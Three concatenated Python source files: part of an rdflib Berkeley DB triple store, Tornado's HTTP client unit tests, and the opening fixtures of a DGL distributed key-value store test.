cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Cheap hack so 2to3 doesn't convert to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(
key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = b("^")
else:
prefix = bb("%s^" % self._to_string(context))
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count += 1
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
if bound_prefix:
self.__namespace.delete(bound_prefix)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
ns = self.__namespace.get(prefix, None)
if ns is not None:
return URIRef(ns.decode('utf-8'))
return None
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
prefix = self.__prefix.get(namespace, None)
if prefix is not None:
return prefix.decode('utf-8')
return None
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix.decode('utf-8'), namespace.decode('utf-8')))
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get(bb(
"%s^%s^%s^%s^" % ("", s, p, o)))
if contexts:
for c in contexts.split(b("^")):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
def add_graph(self, graph):
self.__contexts.put(bb(self._to_string(graph)), "")
def remove_graph(self, graph):
self.remove((None, None, None), graph)
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
            # weird behavior from bsddb: append does not take txn as a
            # keyword argument
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i, txn=txn)
else:
i = i.decode()
return i
def __lookup(self, spo, context, txn=None):
subject, predicate, object = spo
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
# print (subject, predicate, object), context, prefix_func, index
# #DEBUG
prefix = bb(
"^".join(prefix_func((subject, predicate, object), context)))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return b("^").join(
(context,
triple[i % 3],
triple[(i + 1) % 3],
triple[(i + 2) % 3], b(""))) # "" to tac on the trailing ^
return to_key
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split(b("^"))
return \
parts[0], \
parts[(3 - i + 0) % 3 + 1], \
parts[(3 - i + 1) % 3 + 1], \
parts[(3 - i + 2) % 3 + 1]
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split(b("^"))
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3 - i + 0) % 3 + 1])
else:
s = subject
if predicate is None: # i & 2:
p = from_string(parts[(3 - i + 1) % 3 + 1])
else:
p = predicate
if object is None: # i & 4:
o = from_string(parts[(3 - i + 2) % 3 + 1])
else:
o = object
return (s, p, o), (
from_string(c) for c in contexts_value.split(b("^")) if c)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1:
s = "s"
if i & 2:
p = "p"
if i & 4:
o = "o"
return "%s,%s,%s" % (s, p, o)
|
httpclient_test.py
|
# -*- coding: utf-8 -*-
import base64
import binascii
from contextlib import closing
import copy
import threading
import datetime
from io import BytesIO
import subprocess
import sys
import time
import typing # noqa: F401
import unicodedata
import unittest
from tornado.escape import utf8, native_str, to_unicode
from tornado import gen
from tornado.httpclient import (
HTTPRequest,
HTTPResponse,
_RequestProxy,
HTTPError,
HTTPClient,
)
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log, app_log
from tornado import netutil
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import skipOnTravis
from tornado.web import Application, RequestHandler, url
from tornado.httputil import format_timestamp, HTTPHeaders
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish(
"Post arg1: %s, arg2: %s"
% (self.get_argument("arg1"), self.get_argument("arg2"))
)
class PutHandler(RequestHandler):
def put(self):
self.write("Put body: ")
self.write(self.request.body)
class RedirectHandler(RequestHandler):
def prepare(self):
self.write("redirects can have bodies too")
self.redirect(
self.get_argument("url"), status=int(self.get_argument("status", "302"))
)
class RedirectWithoutLocationHandler(RequestHandler):
def prepare(self):
# For testing error handling of a redirect with no location header.
self.set_status(301)
self.finish()
class ChunkHandler(RequestHandler):
@gen.coroutine
def get(self):
self.write("asdf")
self.flush()
# Wait a bit to ensure the chunks are sent and received separately.
yield gen.sleep(0.01)
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get("User-Agent", "User agent not set"))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header("Content-Length", 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class PatchHandler(RequestHandler):
def patch(self):
"Return the request payload - so we can check it is being kept"
self.write(self.request.body)
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ("OTHER",) # type: ignore
def method(self):
self.write(self.request.method)
get = head = post = put = delete = options = patch = other = method # type: ignore
class SetHeaderHandler(RequestHandler):
def get(self):
# Use get_arguments for keys to get strings, but
# request.arguments for values to get bytes.
for k, v in zip(self.get_arguments("k"), self.request.arguments["v"]):
self.set_header(k, v)
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application(
[
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/put", PutHandler),
url("/redirect", RedirectHandler),
url("/redirect_without_location", RedirectWithoutLocationHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
url("/patch", PatchHandler),
url("/set_header", SetHeaderHandler),
],
gzip=True,
)
def test_patch_receives_payload(self):
body = b"some patch data"
response = self.fetch("/patch", method="PATCH", body=body)
self.assertEqual(response.code, 200)
self.assertEqual(response.body, body)
@skipOnTravis
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = [] # type: typing.List[bytes]
response = self.fetch("/hello", streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST", body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = [] # type: typing.List[bytes]
response = self.fetch("/chunk", streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_basic_auth(self):
# This test data appears in section 2 of RFC 7617.
self.assertEqual(
self.fetch(
"/auth", auth_username="Aladdin", auth_password="open sesame"
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_explicit_mode(self):
self.assertEqual(
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic",
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_unicode(self):
# This test data appears in section 2.1 of RFC 7617.
self.assertEqual(
self.fetch("/auth", auth_username="test", auth_password="123£").body,
b"Basic dGVzdDoxMjPCow==",
)
# The standard mandates NFC. Give it a decomposed username
# and ensure it is normalized to composed form.
username = unicodedata.normalize("NFD", u"josé")
self.assertEqual(
self.fetch("/auth", auth_username=username, auth_password="səcrət").body,
b"Basic am9zw6k6c8mZY3LJmXQ=",
)
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf",
raise_error=True,
)
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_redirect_without_location(self):
response = self.fetch("/redirect_without_location", follow_redirects=True)
# If there is no location header, the redirect response should
# just be returned as-is. (This should arguably raise an
# error, but libcurl doesn't treat this as an error, so we
# don't either).
self.assertEqual(301, response.code)
def test_redirect_put_with_body(self):
response = self.fetch(
"/redirect?url=/put&status=307", method="PUT", body="hello"
)
self.assertEqual(response.body, b"Put body: hello")
def test_redirect_put_without_body(self):
# This "without body" edge case is similar to what happens with body_producer.
response = self.fetch(
"/redirect?url=/put&status=307",
method="PUT",
allow_nonstandard_methods=True,
)
self.assertEqual(response.body, b"Put body: ")
def test_method_after_redirect(self):
# Legacy redirect codes (301, 302) convert POST requests to GET.
for status in [301, 302, 303]:
url = "/redirect?url=/all_methods&status=%d" % status
resp = self.fetch(url, method="POST", body=b"")
self.assertEqual(b"GET", resp.body)
# Other methods are left alone.
for method in ["GET", "OPTIONS", "PUT", "DELETE"]:
resp = self.fetch(url, method=method, allow_nonstandard_methods=True)
self.assertEqual(utf8(method), resp.body)
# HEAD is different so check it separately.
resp = self.fetch(url, method="HEAD")
self.assertEqual(200, resp.code)
self.assertEqual(b"", resp.body)
# Newer redirects always preserve the original method.
for status in [307, 308]:
url = "/redirect?url=/all_methods&status=307"
for method in ["GET", "OPTIONS", "POST", "PUT", "DELETE"]:
resp = self.fetch(url, method=method, allow_nonstandard_methods=True)
self.assertEqual(method, to_unicode(resp.body))
resp = self.fetch(url, method="HEAD")
self.assertEqual(200, resp.code)
self.assertEqual(b"", resp.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
response = self.fetch(url)
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"), response.body)
def test_body_encoding(self):
unicode_body = u"\xe9"
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch(
"/echopost",
method="POST",
body=unicode_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u"foo",
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith("HTTP/1.1 101"):
# Upgrading to HTTP/2
pass
elif header_line.startswith("HTTP/"):
first_line.append(header_line)
elif header_line != "\r\n":
k, v = header_line.split(":", 1)
headers[k.lower()] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers["content-type"], "text/html; charset=UTF-8")
chunks.append(chunk)
self.fetch(
"/chunk",
header_callback=header_callback,
streaming_callback=streaming_callback,
)
self.assertEqual(len(first_line), 1, first_line)
        self.assertRegex(first_line[0], "HTTP/[0-9]\\.[0-9] 200.*\r\n")
self.assertEqual(chunks, [b"asdf", b"qwer"])
@gen_test
def test_configure_defaults(self):
defaults = dict(user_agent="TestDefaultUserAgent", allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(force_instance=True, defaults=defaults)
try:
response = yield client.fetch(self.get_url("/user_agent"))
self.assertEqual(response.body, b"TestDefaultUserAgent")
finally:
client.close()
def test_header_types(self):
# Header values may be passed as character or utf8 byte strings,
# in a plain dictionary or an HTTPHeaders object.
# Keys must always be the native str type.
# All combinations should have the same results on the wire.
for value in [u"MyUserAgent", b"MyUserAgent"]:
for container in [dict, HTTPHeaders]:
headers = container()
headers["User-Agent"] = value
resp = self.fetch("/user_agent", headers=headers)
self.assertEqual(
resp.body,
b"MyUserAgent",
"response=%r, value=%r, container=%r"
% (resp.body, value, container),
)
def test_multi_line_headers(self):
# Multi-line http headers are rare but rfc-allowed
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.2
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
X-XSS-Protection: 1;
\tmode=block

""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.headers["X-XSS-Protection"], "1; mode=block")
self.io_loop.remove_handler(sock.fileno())
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch("/304_with_content_length")
self.assertEqual(response.code, 304)
self.assertEqual(response.headers["Content-Length"], "42")
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url("/hello"))
self.assertEqual(response.body, b"Hello world!")
@gen_test
def test_future_http_error(self):
with self.assertRaises(HTTPError) as context:
yield self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(context.exception.code, 404)
self.assertEqual(context.exception.response.code, 404)
@gen_test
def test_future_http_error_no_raise(self):
response = yield self.http_client.fetch(
self.get_url("/notfound"), raise_error=False
)
self.assertEqual(response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url("/hello")
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b"Hello world!")
@gen_test
def test_bind_source_ip(self):
url = self.get_url("/hello")
request = HTTPRequest(url, network_interface="127.0.0.1")
response = yield self.http_client.fetch(request)
self.assertEqual(response.code, 200)
with self.assertRaises((ValueError, HTTPError)) as context:
request = HTTPRequest(url, network_interface="not-interface-or-ip")
yield self.http_client.fetch(request)
self.assertIn("not-interface-or-ip", str(context.exception))
def test_all_methods(self):
for method in ["GET", "DELETE", "OPTIONS"]:
response = self.fetch("/all_methods", method=method)
self.assertEqual(response.body, utf8(method))
for method in ["POST", "PUT", "PATCH"]:
response = self.fetch("/all_methods", method=method, body=b"")
self.assertEqual(response.body, utf8(method))
response = self.fetch("/all_methods", method="HEAD")
self.assertEqual(response.body, b"")
response = self.fetch(
"/all_methods", method="OTHER", allow_nonstandard_methods=True
)
self.assertEqual(response.body, b"OTHER")
def test_body_sanity_checks(self):
# These methods require a body.
for method in ("POST", "PUT", "PATCH"):
with self.assertRaises(ValueError) as context:
self.fetch("/all_methods", method=method, raise_error=True)
self.assertIn("must not be None", str(context.exception))
resp = self.fetch(
"/all_methods", method=method, allow_nonstandard_methods=True
)
self.assertEqual(resp.code, 200)
# These methods don't allow a body.
for method in ("GET", "DELETE", "OPTIONS"):
with self.assertRaises(ValueError) as context:
self.fetch(
"/all_methods", method=method, body=b"asdf", raise_error=True
)
self.assertIn("must be None", str(context.exception))
# In most cases this can be overridden, but curl_httpclient
# does not allow body with a GET at all.
if method != "GET":
                resp = self.fetch(
"/all_methods",
method=method,
body=b"asdf",
allow_nonstandard_methods=True,
raise_error=True,
)
self.assertEqual(resp.code, 200)
# This test causes odd failures with the combination of
# curl_httpclient (at least with the version of libcurl available
# on ubuntu 12.04), TwistedIOLoop, and epoll. For POST (but not PUT),
# curl decides the response came back too soon and closes the connection
# to start again. It does this *before* telling the socket callback to
# unregister the FD. Some IOLoop implementations have special kernel
# integration to discover this immediately. Tornado's IOLoops
# ignore errors on remove_handler to accommodate this behavior, but
# Twisted's reactor does not. The removeReader call fails and so
# do all future removeAll calls (which our tests do at cleanup).
#
# def test_post_307(self):
# response = self.fetch("/redirect?status=307&url=/post",
# method="POST", body=b"arg1=foo&arg2=bar")
# self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_put_307(self):
response = self.fetch(
"/redirect?status=307&url=/put", method="PUT", body=b"hello"
)
response.rethrow()
self.assertEqual(response.body, b"Put body: hello")
def test_non_ascii_header(self):
# Non-ascii headers are sent as latin1.
response = self.fetch("/set_header?k=foo&v=%E9")
response.rethrow()
self.assertEqual(response.headers["Foo"], native_str(u"\u00e9"))
def test_response_times(self):
# A few simple sanity checks of the response time fields to
# make sure they're using the right basis (between the
# wall-time and monotonic clocks).
start_time = time.time()
response = self.fetch("/hello")
response.rethrow()
self.assertGreaterEqual(response.request_time, 0)
self.assertLess(response.request_time, 1.0)
# A very crude check to make sure that start_time is based on
# wall time and not the monotonic clock.
self.assertLess(abs(response.start_time - start_time), 1.0)
for k, v in response.time_info.items():
self.assertTrue(0 <= v < 1.0, "time_info[%s] out of bounds: %s" % (k, v))
@gen_test
def test_error_after_cancel(self):
fut = self.http_client.fetch(self.get_url("/404"))
self.assertTrue(fut.cancel())
with ExpectLog(app_log, "Exception after Future was cancelled") as el:
# We can't wait on the cancelled Future any more, so just
# let the IOLoop run until the exception gets logged (or
# not, in which case we exit the loop and ExpectLog will
# raise).
for i in range(100):
yield gen.sleep(0.01)
if el.logged_stack:
break
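# A hedged, dependency-free sketch (not tornado's actual implementation) of
# the attribute-fallback behaviour that RequestProxyTest below verifies for
# the private _RequestProxy class: values set on the request win, then the
# defaults dict, and unknown attribute names still raise AttributeError.
class _FallbackProxySketch:
    def __init__(self, obj, defaults):
        self._obj = obj
        self._defaults = defaults or {}
    def __getattr__(self, name):
        # getattr() raises AttributeError for names the request doesn't have
        value = getattr(self._obj, name)
        if value is not None:
            return value
        return self._defaults.get(name)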
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", user_agent="foo"), dict()
)
self.assertEqual(proxy.user_agent, "foo")
def test_default_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/"), dict(network_interface="foo")
)
self.assertEqual(proxy.network_interface, "foo")
def test_both_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", proxy_host="foo"), dict(proxy_host="bar")
)
self.assertEqual(proxy.proxy_host, "foo")
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse( # type: ignore
HTTPRequest("http://example.com"), 200, headers={}, buffer=BytesIO()
)
s = str(response)
self.assertTrue(s.startswith("HTTPResponse("))
self.assertIn("code=200", s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
self.server_ioloop = IOLoop()
event = threading.Event()
@gen.coroutine
def init_server():
sock, self.port = bind_unused_port()
app = Application([("/", HelloWorldHandler)])
self.server = HTTPServer(app)
self.server.add_socket(sock)
event.set()
def start():
self.server_ioloop.run_sync(init_server)
self.server_ioloop.start()
self.server_thread = threading.Thread(target=start)
self.server_thread.start()
event.wait()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
# Delay the shutdown of the IOLoop by several iterations because
# the server may still have some cleanup work left when
# the client finishes with the response (this is noticeable
# with http/2, which leaves a Future with an unexamined
# StreamClosedError on the loop).
@gen.coroutine
def slow_stop():
yield self.server.close_all_connections()
# The number of iterations is difficult to predict. Typically,
# one is sufficient, although sometimes it needs more.
for i in range(5):
yield
self.server_ioloop.stop()
self.server_ioloop.add_callback(slow_stop)
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return "http://127.0.0.1:%d%s" % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url("/"))
self.assertEqual(b"Hello world!", response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(assertion.exception.code, 404)
class SyncHTTPClientSubprocessTest(unittest.TestCase):
def test_destructor_log(self):
# Regression test for
# https://github.com/tornadoweb/tornado/issues/2539
#
# In the past, the following program would log an
# "inconsistent AsyncHTTPClient cache" error from a destructor
# when the process is shutting down. The shutdown process is
# subtle and I don't fully understand it; the failure does not
# manifest if that lambda isn't there or is a simpler object
# like an int (nor does it manifest in the tornado test suite
# as a whole, which is why we use this subprocess).
proc = subprocess.run(
[
sys.executable,
"-c",
"from tornado.httpclient import HTTPClient; f = lambda: None; c = HTTPClient()",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=True,
)
if proc.stdout:
print("STDOUT:")
print(to_unicode(proc.stdout))
if proc.stdout:
self.fail("subprocess produced unexpected output")
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest("http://example.com", headers={"foo": "bar"})
self.assertEqual(request.headers, {"foo": "bar"})
def test_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = {"bar": "baz"} # type: ignore
self.assertEqual(request.headers, {"bar": "baz"})
def test_null_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = None # type: ignore
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest("http://example.com", body="foo")
self.assertEqual(request.body, utf8("foo"))
def test_body_setter(self):
request = HTTPRequest("http://example.com")
request.body = "foo" # type: ignore
self.assertEqual(request.body, utf8("foo"))
def test_if_modified_since(self):
http_date = datetime.datetime.utcnow()
request = HTTPRequest("http://example.com", if_modified_since=http_date)
self.assertEqual(
request.headers, {"If-Modified-Since": format_timestamp(http_date)}
)
class HTTPErrorTestCase(unittest.TestCase):
def test_copy(self):
e = HTTPError(403)
e2 = copy.copy(e)
self.assertIsNot(e, e2)
self.assertEqual(e.code, e2.code)
def test_plain_error(self):
e = HTTPError(403)
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
def test_error_with_response(self):
resp = HTTPResponse(HTTPRequest("http://example.com/"), 403)
with self.assertRaises(HTTPError) as cm:
resp.rethrow()
e = cm.exception
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
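# Illustrative sketch, not part of the original test module: a minimal
# example of the synchronous-client pattern exercised by SyncHTTPClientTest
# above. By default fetch() raises HTTPError for non-2xx responses, and the
# client should always be closed. The URL is a placeholder.
def fetch_body_or_none(url="http://127.0.0.1:8888/"):
    client = HTTPClient()
    try:
        return client.fetch(url).body
    except HTTPError as e:
        print("request failed with code", e.code)
        return None
    finally:
        client.close()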
|
test_new_kvstore.py
|
import os
import time
import numpy as np
import socket
from scipy import sparse as spsp
import dgl
import backend as F
import unittest, pytest
from dgl.graph_index import create_graph_index
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
    except OSError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
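# Hedged usage note: the returned string is "IP PORT" separated by a single
# space, matching the ip_config lines written by the tests below. A tiny
# illustrative helper (not used by the tests) to split it back apart:
def split_usable_addr(addr=None):
    ip_addr, port = (addr or get_local_usable_addr()).split(' ')
    return ip_addr, int(port)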
# Create a one-part graph
node_map = F.tensor([0,0,0,0,0,0], F.int64)
edge_map = F.tensor([0,0,0,0,0,0,0], F.int64)
global_nid = F.tensor([0,1,2,3,4,5], F.int64)
global_eid = F.tensor([0,1,2,3,4,5,6], F.int64)
g = dgl.DGLGraph()
g.add_nodes(6)
g.add_edges(0, 1) # 0
g.add_edges(0, 2) # 1
g.add_edges(0, 3) # 2
g.add_edges(2, 3) # 3
g.add_edges(1, 1) # 4
g.add_edges(0, 4) # 5
g.add_edges(2, 5) # 6
g.ndata[dgl.NID] = global_nid
g.edata[dgl.EID] = global_eid
gpb = dgl.distributed.GraphPartitionBook(part_id=0,
num_parts=1,
node_map=node_map,
edge_map=edge_map,
part_graph=g)
node_policy = dgl.distributed.PartitionPolicy(policy_str='node',
partition_book=gpb)
edge_policy = dgl.distributed.PartitionPolicy(policy_str='edge',
partition_book=gpb)
data_0 = F.tensor([[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.],[1.,1.]], F.float32)
data_0_1 = F.tensor([1.,2.,3.,4.,5.,6.], F.float32)
data_0_2 = F.tensor([1,2,3,4,5,6], F.int32)
data_0_3 = F.tensor([1,2,3,4,5,6], F.int64)
data_1 = F.tensor([[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.],[2.,2.]], F.float32)
data_2 = F.tensor([[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.],[0.,0.]], F.float32)
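# data_0, data_0_1/2/3 and data_2 are node-partitioned (6 rows, one per node,
# with assorted dtypes to exercise metadata); data_1 is edge-partitioned
# (7 rows, one per edge).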
def init_zero_func(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
def udf_push(target, name, id_tensor, data_tensor):
target[name][id_tensor] = data_tensor * data_tensor
def add_push(target, name, id_tensor, data_tensor):
target[name][id_tensor] += data_tensor
